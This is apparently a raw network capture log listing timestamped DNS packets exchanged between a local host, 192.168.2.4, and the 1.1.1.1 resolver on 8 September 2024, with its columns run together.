                                                                                                                                                                                                            Sep 8, 2024 09:00:31.790327072 CEST5023053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.791053057 CEST53565261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.799201965 CEST53554721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.801413059 CEST53492431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.806358099 CEST53502301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.926817894 CEST53608881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.932779074 CEST53614331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.933304071 CEST53534911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:31.933315039 CEST53496211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.210016012 CEST6455253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.211595058 CEST4968753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.215580940 CEST5421453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.221369028 CEST5819253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.226690054 CEST6458653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.227267981 CEST53496871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228173018 CEST5582553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228216887 CEST5951053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228676081 CEST5616853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.228846073 CEST5938653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660769939 CEST5437453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.660928011 CEST5960653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661215067 CEST6551953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661410093 CEST5783953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.661696911 CEST6410653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.662281990 CEST5483753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663275957 CEST6349253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.663328886 CEST53508111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666224957 CEST6042353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.666419029 CEST6009053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.667299986 CEST53641021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.667593002 CEST53604751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.668260098 CEST53499491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.669069052 CEST53513341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.670453072 CEST53596061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.671266079 CEST53641061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.672430992 CEST53634921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.672466993 CEST53548371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.674210072 CEST53631341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.674294949 CEST53593021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675023079 CEST53510471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675318956 CEST53600901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675673962 CEST53580501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675828934 CEST5416853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.675901890 CEST53543741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676026106 CEST5503553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676105022 CEST53604231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676182985 CEST53512031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676513910 CEST53578391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.676907063 CEST53614371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.681413889 CEST5471853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.686218023 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.688604116 CEST5790253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.689647913 CEST53655331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.691852093 CEST53547181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.692368031 CEST53655191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.699218988 CEST53579021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704194069 CEST5184753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.704626083 CEST5096453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707051992 CEST5015653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707619905 CEST53541681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.707859039 CEST6150453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708024025 CEST5372853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708129883 CEST6388153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708308935 CEST5411653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708465099 CEST5918253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.708816051 CEST5864553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.714222908 CEST53518471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.715676069 CEST53501561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.716823101 CEST53615041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.717833042 CEST53586451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.718049049 CEST53591821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.718128920 CEST53541161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.723885059 CEST53537281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732443094 CEST5200553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732621908 CEST4969353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732773066 CEST5842353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.732956886 CEST5886053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737730026 CEST4918653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.737903118 CEST5636953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738806963 CEST5118553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.738915920 CEST5367553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739048004 CEST5242953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739223003 CEST6108253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739387989 CEST6107653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.739715099 CEST6132153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740091085 CEST6271453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740396976 CEST4957553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740572929 CEST5975353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740711927 CEST6281453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740863085 CEST5063053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.740995884 CEST5335853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.741955996 CEST6358053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742006063 CEST53496931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742019892 CEST53520051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.742031097 CEST53588601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.743262053 CEST4965853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.743447065 CEST53584231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748164892 CEST53536751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748258114 CEST53491861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748410940 CEST53511851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.748753071 CEST53524291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749048948 CEST53610761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749258041 CEST53495751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749411106 CEST53613211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749737978 CEST53610821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749772072 CEST53506301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.749921083 CEST53627141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.750101089 CEST53628141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.751705885 CEST53563691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.751802921 CEST53635801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754663944 CEST6234153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754746914 CEST5805253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754836082 CEST5623953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.754931927 CEST6378053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.755081892 CEST5462253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.756551027 CEST53533581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.764499903 CEST53580521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.764918089 CEST53623411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.769772053 CEST53546221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.771414042 CEST53597531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.784504890 CEST53562391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.785835028 CEST53637801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.804500103 CEST5310953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:32.813487053 CEST53531091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.666269064 CEST53579021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.667604923 CEST5274053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.671494007 CEST53646091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.672431946 CEST53642661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.672863007 CEST6527553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676167965 CEST6464053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676359892 CEST6281353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676527977 CEST5307353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676697016 CEST5566653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.676851988 CEST6195153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677021027 CEST5728353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.677179098 CEST5475153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.679483891 CEST53566651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.679868937 CEST53572461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.680629015 CEST6459253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.680973053 CEST53575801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.683916092 CEST53547511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685269117 CEST5230553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685417891 CEST53628131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685430050 CEST5906853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.685914993 CEST5031153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686244011 CEST5074253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686629057 CEST6287553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.686805010 CEST4953853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687016010 CEST53572831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687036991 CEST53619511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.687222004 CEST6167853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.690013885 CEST53645921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.691950083 CEST53530731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.692836046 CEST53646401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698297024 CEST53503111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698312044 CEST53507421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.698399067 CEST53590681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699223995 CEST53504011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699690104 CEST53495381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.699703932 CEST53523051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.700361013 CEST53616781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703248978 CEST6230753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703458071 CEST5898453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703620911 CEST4986253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703789949 CEST5332353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.703967094 CEST6245753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.713061094 CEST53623071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.714040041 CEST53533231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.714963913 CEST53624571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.716984987 CEST4980353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.718970060 CEST53498621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.719480991 CEST53589841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.730494976 CEST53498031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.747122049 CEST6201153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.749471903 CEST5875053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751143932 CEST5944353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.751606941 CEST5694253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.753350019 CEST6462353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.754793882 CEST5992853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.755187035 CEST6539153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.757437944 CEST53620111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758148909 CEST5102353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.758996964 CEST5521553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.759149075 CEST53587501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.761838913 CEST53569421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764748096 CEST4964753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764844894 CEST6287453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.764996052 CEST6358953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.767554998 CEST53599281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.768774033 CEST53653911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.769752979 CEST53594431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.770234108 CEST53552151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.770304918 CEST53646231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.771945000 CEST53510231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.774935007 CEST6484853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775309086 CEST5315653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775564909 CEST5122953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775806904 CEST53628741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775818110 CEST53496471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.775923967 CEST6347353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776046991 CEST5672353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.776604891 CEST53635891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.777234077 CEST5649953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.778081894 CEST5904853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780553102 CEST5818053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.780920029 CEST6185553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781799078 CEST6232153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.781912088 CEST5292653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782001019 CEST5461653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782224894 CEST5073853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782445908 CEST6263453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782639027 CEST6426753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.782788038 CEST5313253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783044100 CEST5413453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783741951 CEST5435853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783773899 CEST53648481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.783866882 CEST5353853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.784715891 CEST53567231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785196066 CEST53634731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785360098 CEST53531561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.785525084 CEST53512291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787949085 CEST53564991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.787959099 CEST53590481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.790687084 CEST53618551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.792280912 CEST53626341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.793040991 CEST53546161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794044971 CEST53529261.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.794132948 CEST53507381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.796139002 CEST53623211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.522183895 CEST53651531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.529809952 CEST53503581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.532610893 CEST6090753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.538800955 CEST53624511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.546567917 CEST53609071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.587255955 CEST53528641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.611340046 CEST53554011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.838671923 CEST5157753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.842170954 CEST5111553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.846231937 CEST5117353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.851015091 CEST6112753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859304905 CEST53511151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.859857082 CEST53511731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.861797094 CEST53515771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.862387896 CEST5466953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.866132975 CEST53611271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.878861904 CEST53546691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.883356094 CEST6277853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.884131908 CEST5884053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.894299030 CEST53627781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.897550106 CEST53588401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.900595903 CEST5532053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.904134035 CEST6238553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.917723894 CEST53553201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.924139023 CEST53623851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930319071 CEST5944453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.930931091 CEST5839053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.933984995 CEST5645753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934312105 CEST5137553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934395075 CEST5923253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.934700966 CEST5677153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.936332941 CEST5816253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.937684059 CEST6512753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.940045118 CEST5196953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941462994 CEST53594441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.941981077 CEST6259153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.942336082 CEST6365253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.943952084 CEST4966553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944808960 CEST53567711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.944822073 CEST53592321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946002007 CEST6457953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946278095 CEST53581621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.946746111 CEST53583901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949166059 CEST53651271.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949628115 CEST53519691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.949856997 CEST53564571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.951356888 CEST53625911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.952090025 CEST53636521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.956051111 CEST53645791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.958868027 CEST5809453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960280895 CEST53496651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.960967064 CEST5544653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961483955 CEST5019653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:34.961528063 CEST5252453192.168.2.41.1.1.1
